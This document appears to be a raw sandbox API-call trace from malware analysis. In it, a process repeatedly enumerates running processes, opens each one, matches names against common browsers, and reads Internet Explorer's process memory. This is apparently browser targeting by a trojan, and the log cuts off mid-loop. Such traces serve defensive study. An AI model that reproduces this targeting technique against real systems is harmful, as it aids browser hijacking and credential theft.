	[0242.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.247] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0242.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.248] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.248] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0242.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.248] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.248] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0242.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x88b4
	[0242.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.249] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0242.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.250] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.250] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0242.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.250] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.250] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0242.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x88b8
	[0242.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.251] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0242.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.252] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.252] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0242.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.252] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.253] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0242.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x88bc
	[0242.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.254] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0242.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.254] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.255] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0242.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.256] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0242.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x88c0
	[0242.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.257] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0242.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.257] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.258] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0242.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.258] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.259] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0242.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x88c4
	[0242.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.259] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0242.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.260] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.261] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0242.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.261] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.262] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0242.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x88c8
	[0242.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.263] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0242.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.263] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.264] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0242.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.264] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.265] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x88cc
	[0242.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.265] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0242.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.266] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0242.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.266] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0242.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.266] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.266] NtQueryInformationProcess (in: ProcessHandle=0x88cc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0242.267] ReadProcessMemory (in: hProcess=0x88cc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0242.267] ReadProcessMemory (in: hProcess=0x88cc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0242.267] ReadProcessMemory (in: hProcess=0x88cc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0242.267] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0242.267] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0242.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x88d0
	[0242.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.268] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0242.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.269] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0242.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.269] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0242.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.269] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.269] NtQueryInformationProcess (in: ProcessHandle=0x88d0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0242.269] ReadProcessMemory (in: hProcess=0x88d0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0242.269] ReadProcessMemory (in: hProcess=0x88d0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0242.270] ReadProcessMemory (in: hProcess=0x88d0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0242.270] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0242.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x88d4
	[0242.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.271] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0242.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.271] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.271] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0242.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.272] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0242.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x88d8
	[0242.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.273] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0242.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.273] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.273] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0242.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.274] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x88dc
	[0242.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.275] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.275] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.276] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.276] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.277] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x88e0
	[0242.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.278] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.278] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.278] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.279] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x88e4
	[0242.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.280] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.280] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.280] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.281] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.281] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x88e8
	[0242.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.282] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0242.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.283] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.283] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0242.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.284] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.284] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.285] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x88ec
	[0242.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.285] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.285] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.286] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.286] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x88f0
	[0242.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.287] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.288] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.288] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.288] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0242.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x88f4
	[0242.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.289] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0242.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.290] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.290] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0242.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.290] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.290] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0242.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x88f8
	[0242.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.291] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.292] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.292] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.292] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0242.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x88fc
	[0242.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.293] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0242.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.294] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.294] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0242.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.294] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8900
	[0242.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.295] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.295] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.296] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.296] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0242.297] CloseHandle (hObject=0x4fd0) returned 1
	[0242.297] Sleep (dwMilliseconds=0x64) 
	[0242.394] GetCurrentProcessId () returned 0x110
	[0242.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0242.400] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0242.403] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0242.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0242.406] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8904
	[0242.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.407] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.407] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.408] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
